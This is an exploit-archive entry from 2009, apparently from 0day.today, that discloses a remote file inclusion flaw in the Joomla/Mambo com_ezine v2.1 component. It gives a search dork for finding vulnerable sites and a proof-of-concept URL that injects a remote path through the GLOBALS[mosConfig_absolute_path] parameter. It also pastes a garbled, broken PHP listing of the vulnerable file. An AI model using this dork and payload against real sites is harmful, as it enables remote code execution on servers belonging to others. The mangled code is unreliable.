Joomla / Mambo Component com_ezine v2.1 Remote File Include

2009-10-20T00:00:00
ID 1337DAY-ID-9936
Type zdt
Reporter kaMtiEz
Modified 2009-10-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================================
Joomla / Mambo Component com_ezine v2.1 Remote File Include Vulnerability
=========================================================================

#####################################################################################################
## Joomla / Mambo Component com_ezine Remote File Include vulnerability ##
## Author : kaMtiEz 
## Homepage : http://www.indonesiancoder.com ##
## Date : October 20 2009 ##
#####################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#####################################################################################################
 
[ Software Information ]
 
[+] Vendor : http://designformamb0.c0m
[+] Download : -
[+] version : 2.1
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_ezine"
[+] Location : INDONESIA
 
[DESCRIPTION]
 
/**
* eZine component v2.1
*
* @license Commercial Product - Single Site License or Free to Use with Limitation
**/
 
###############################################
 
[ PoC ]
 
http://server/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]
 
[ Bugs File ]
 
[+] d4m_ajax_pagenav.php
 
total / $this->limit );
$this_page = ceil( ($this->limitstart+1) / $this->limit );
$start_loop = (floor(($this_page-1)/$displayed_pages))*$displayed_pages+1;
if ($start_loop + $displayed_pages - 1 1) {
$page = ($this_page - 2) * $this->limit;
$txt .= '<< '. _PN_START .' ';
$txt .= '< '. _PN_PREVIOUS .' ';
} else {
$txt .= '<< '. _PN_START .' ';
$txt .= '< '. _PN_PREVIOUS .' ';
}
 
for ($i=$start_loop; $i limit;
if ($i == $this_page) {
$txt .= ''. $i .' ';
} else {
$txt .= ''. $i .' ';
}
}
 
if ($this_page limit;
$end_page = ($total_pages-1) * $this->limit;
$txt .= ''. _PN_NEXT .' > ';
$txt .= ''. _PN_END .' >>';
} else {
$txt .= ''. _PN_NEXT .' > ';
$txt .= ''. _PN_END .' >>';
}
return $txt;
}
}
?>



#  0day.today [2018-04-08]  #